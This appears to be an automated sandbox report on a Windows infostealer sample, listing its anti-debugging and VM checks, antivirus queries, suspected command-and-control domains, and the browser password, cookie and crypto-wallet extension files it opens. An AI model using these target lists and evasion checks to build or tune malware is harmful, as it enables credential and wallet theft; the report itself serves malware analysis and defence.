Source: file.exe, file.exe, 00000000.00000003.3295643182.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049219043.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302511591.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2910063817.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302511591.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000002.3302438541.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: file.exe, 00000000.00000003.2749257765.00000000055D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2779545659.000000000557A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: kyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6n
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: file.exe, 00000000.00000002.3299367042.00000000005B5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: presticitpo.store
Source: file.exe, 00000000.00000002.3300242941.00000000005F8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: EProgram Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: file.exe, file.exe, 00000000.00000003.3271527180.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3271676892.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3271793739.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3278936830.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3288959776.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3271814012.0000000000E27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 5936, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.2909749635.0000000000E28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum\wallets
Source: file.exe, 00000000.00000003.2909749635.0000000000E25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000000.00000003.3297236452.0000000000E50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000003.2909749635.0000000000E25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: file.exe | String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000003.2909749635.0000000000E25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
Source: file.exe, 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflab
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflab
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
